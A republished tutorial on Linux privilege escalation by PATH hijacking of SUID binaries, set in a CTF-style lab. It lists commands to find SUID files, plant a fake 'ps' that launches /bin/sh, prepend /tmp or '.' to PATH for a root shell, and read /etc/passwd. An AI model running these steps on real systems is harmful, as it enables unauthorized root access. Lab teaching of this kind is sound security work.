BestHub
Sign in
Information Security 8 min read

How to Exploit PATH Environment Variables for Linux Privilege Escalation

This article demonstrates multiple techniques for abusing the PATH environment variable and SUID binaries on Linux systems to gain root privileges, providing step‑by‑step lab setup, C source examples, compilation commands, and exploitation methods commonly used in CTF challenges.

MaGe Linux Operations
MaGe Linux Operations
MaGe Linux Operations
How to Exploit PATH Environment Variables for Linux Privilege Escalation

Introduction

PATH is an environment variable that tells the shell where to look for executable files. If the current directory ('.') appears in PATH, a user can run binaries from that directory, which can be leveraged for privilege escalation.

Display the current PATH: echo $PATH Typical output:

/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

Method 1

Lab setup

Create a script directory under /home/raj and write a small C program ( demo.c) that calls ps.

pwd
mkdir script
cd /script
nano demo.c

Compile the program, set the SUID bit, and list the file:

gcc demo.c -o shell
chmod u+s shell
ls -la shell

On the victim VM, find all SUID files: find / -perm -u=s -type f 2>/dev/null Execute the SUID binary /home/raj/script/shell to obtain a root shell.

Alternative exploitation commands:

# Echo command
cd /tmp
echo "/bin/sh" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./shell
whoami

# Copy command
cp /bin/sh /tmp/ps
export PATH=/tmp:$PATH
./shell
whoami

# Symlink command
ln -s /bin/sh ps
export PATH=.:$PATH
./shell
id
whoami

Method 2

Repeat the lab setup, but the C program calls id instead of ps. Compile, set SUID, and execute /home/raj/script/shell2 on the victim machine using the same find command to locate the binary.

gcc demo.c -o shell2
chmod u+s shell2
ls -la shell2

Run the binary to obtain elevated privileges.

Method 3

Again repeat the setup; this time the C program calls cat to read /etc/passwd. After compiling and setting SUID, the binary /home/raj/script/raj is executed, printing the password file contents.

gcc demo.c -o raj
chmod u+s raj
ls -la raj

Execute:

cd /home/raj/script
./raj

Method 4

Similar to Method 3, but the C program attempts to cat a non‑existent msg.txt file. After compiling and setting SUID on ignite, running the binary demonstrates the error handling when the target file is missing.

gcc demo.c -o ignite
chmod u+s ignite
ls -la ignite

Execute:

cd /home/raj/script
./ignite
Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

LinuxShellCTFpathSUID
MaGe Linux Operations
Written by

MaGe Linux Operations

Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.

Sign in to comment